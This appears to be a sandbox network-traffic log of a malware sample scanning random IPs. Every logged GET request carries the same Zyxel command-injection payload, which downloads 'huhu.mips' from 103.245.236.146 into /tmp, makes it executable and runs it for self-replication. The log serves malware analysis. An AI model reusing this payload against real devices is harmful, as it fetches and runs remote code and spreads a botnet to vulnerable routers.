                                              Jan 29, 2024 07:03:41.847803116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2498192.168.2.1438202223.64.22.165443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:41.847836018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2499192.168.2.1460066171.63.107.11443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:41.847886086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2500192.168.2.144508294.107.222.194443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:41.847922087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2501192.168.2.1436706176.2.56.153443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:41.847963095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2502192.168.2.14598801.95.125.186443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:41.848005056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2503192.168.2.1441346170.186.122.206443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:41.848035097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2504192.168.2.1449798182.182.128.103443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:41.848067999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2505192.168.2.1434254136.11.151.236443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:41.848102093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2506192.168.2.1439100222.250.125.48443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:41.848155022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2507192.168.2.1433274180.120.21.2443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:41.848196030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2508192.168.2.1460524189.122.22.136443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:41.848237038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2509192.168.2.1458600171.14.228.69443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:41.848284006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2510192.168.2.1457190139.201.152.78443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:41.848320961 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2511192.168.2.143725841.106.80.176443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:41.848366976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2512192.168.2.144322874.122.138.201443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:41.848401070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2513192.168.2.1439814146.211.23.245443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:41.848437071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2514192.168.2.143792451.79.253.148443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:41.848472118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2515192.168.2.1436064218.161.137.29443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:41.848515987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2516192.168.2.1455616142.253.179.54443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:41.848543882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2517192.168.2.145321498.23.135.31443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:41.848568916 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2518192.168.2.145998018.201.121.95443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:41.848633051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2519192.168.2.144296817.154.172.196443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:41.848668098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2520192.168.2.145701052.23.88.99443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:41.851979971 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2521192.168.2.1446952131.236.36.241443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:41.851999044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2522192.168.2.1434584185.76.34.103443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:41.852051973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2523192.168.2.144272658.88.147.29443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:41.852081060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2524192.168.2.143280699.130.174.172443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:41.852133989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2525192.168.2.1449858144.58.145.193443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:41.852178097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2526192.168.2.1449776135.209.23.4443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:41.853775024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2527192.168.2.1444554103.122.151.81443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:41.853826046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2528192.168.2.145594227.15.44.139443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:42.862627029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2529192.168.2.1445474156.13.108.142443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:42.862673044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2530192.168.2.1447288112.70.86.30443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:42.862705946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2531192.168.2.144177872.185.117.244443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:42.862742901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2532192.168.2.1455542211.1.31.39443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:42.862778902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2533192.168.2.143940857.168.122.107443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:42.862832069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2534192.168.2.144541841.147.23.138443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:42.862869024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2535192.168.2.1436792184.120.39.239443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:42.862931013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2536192.168.2.144283652.42.224.196443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:42.862970114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2537192.168.2.1442056203.0.146.2443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:42.862992048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2538192.168.2.143721665.203.243.33443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:42.863018990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2539192.168.2.144269252.168.197.16443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:42.863068104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2540192.168.2.145011042.169.236.116443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:42.863100052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2541192.168.2.1458600152.77.197.158443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:42.863135099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2542192.168.2.1445608126.132.253.76443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:42.863179922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2543192.168.2.143783090.222.168.208443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:42.863205910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2544192.168.2.1454158201.73.228.106443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:42.863236904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2545192.168.2.1452090154.207.45.220443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:42.863270044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2546192.168.2.1459982132.151.233.45443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:42.863308907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2547192.168.2.1455972136.253.164.4443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:42.863343954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2548192.168.2.1454300202.3.9.89443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:42.863401890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2549192.168.2.1432858176.31.238.251443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:42.863435984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2550192.168.2.1459258143.1.250.200443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:42.863487005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2551192.168.2.1460052180.117.79.52443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:42.863523006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2552192.168.2.1442290130.147.54.133443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:42.863554001 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2553192.168.2.1449266219.163.31.241443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:42.863588095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2554192.168.2.1437238155.53.34.233443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:42.863629103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2555192.168.2.145137838.40.14.191443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:42.863662004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2556192.168.2.1440568220.31.65.216443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:42.863708973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2557192.168.2.144711476.147.150.196443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:42.863754988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2558192.168.2.144257877.155.160.163443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:42.863790035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2559192.168.2.1448596220.176.235.143443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:42.863821030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2560192.168.2.145673693.178.37.103443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:42.863857985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2561192.168.2.1443320128.85.214.44443
                                              TimestampBytes transferredDirectionData
